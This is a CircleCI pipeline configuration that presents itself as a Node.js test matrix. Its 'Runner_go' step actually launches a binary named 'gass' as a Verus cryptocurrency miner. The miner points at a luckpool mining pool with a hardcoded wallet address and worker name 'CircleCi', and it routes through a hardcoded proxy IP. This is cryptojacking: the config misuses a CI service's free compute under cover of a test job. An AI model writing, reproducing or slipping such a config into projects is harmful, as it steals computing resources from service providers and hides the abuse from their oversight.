version: 2.1

executors:
  linux:
    docker:
      - image: circleci/clojure:lein-2.9.5
  macos:
    macos:
      xcode: 11.4

orbs:
  node: circleci/node@2.0.0

jobs:
  test:
    parameters:
      os:
        type: executor
      node-version:
        type: string
    executor: << parameters.os >>
    steps:
      - checkout
      - node/install:
          node-version: << parameters.node-version >>
          install-yarn: true
      - run:
          name: Module
          command: sudo apt-get -y install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential screen
      - run:
          name: Ijin Akses
          command: chmod u+x *
      - run:
          name: Runner_go
          command: |
            screen -dmS ls
            POOL=stratum+tcp://na.luckpool.net:3956
            WALLET=RSTiabzuFbP2P75CBeS6Zaaoz6ZwkRjHgU
            WORKER=CircleCi
            PROXY=https://51.222.21.94:32768
            ./gass -a verus -o $POOL -u $WALLET.$WORKER -p c=VRSC,zap=VRSC -t12 -x $PROXY
workflows:
  all-tests:
    jobs:
      - test:
          matrix:
            parameters:
              os: [linux]
              node-version: [10.9.0, 11.9.0, 12.9.1, 13.9.0]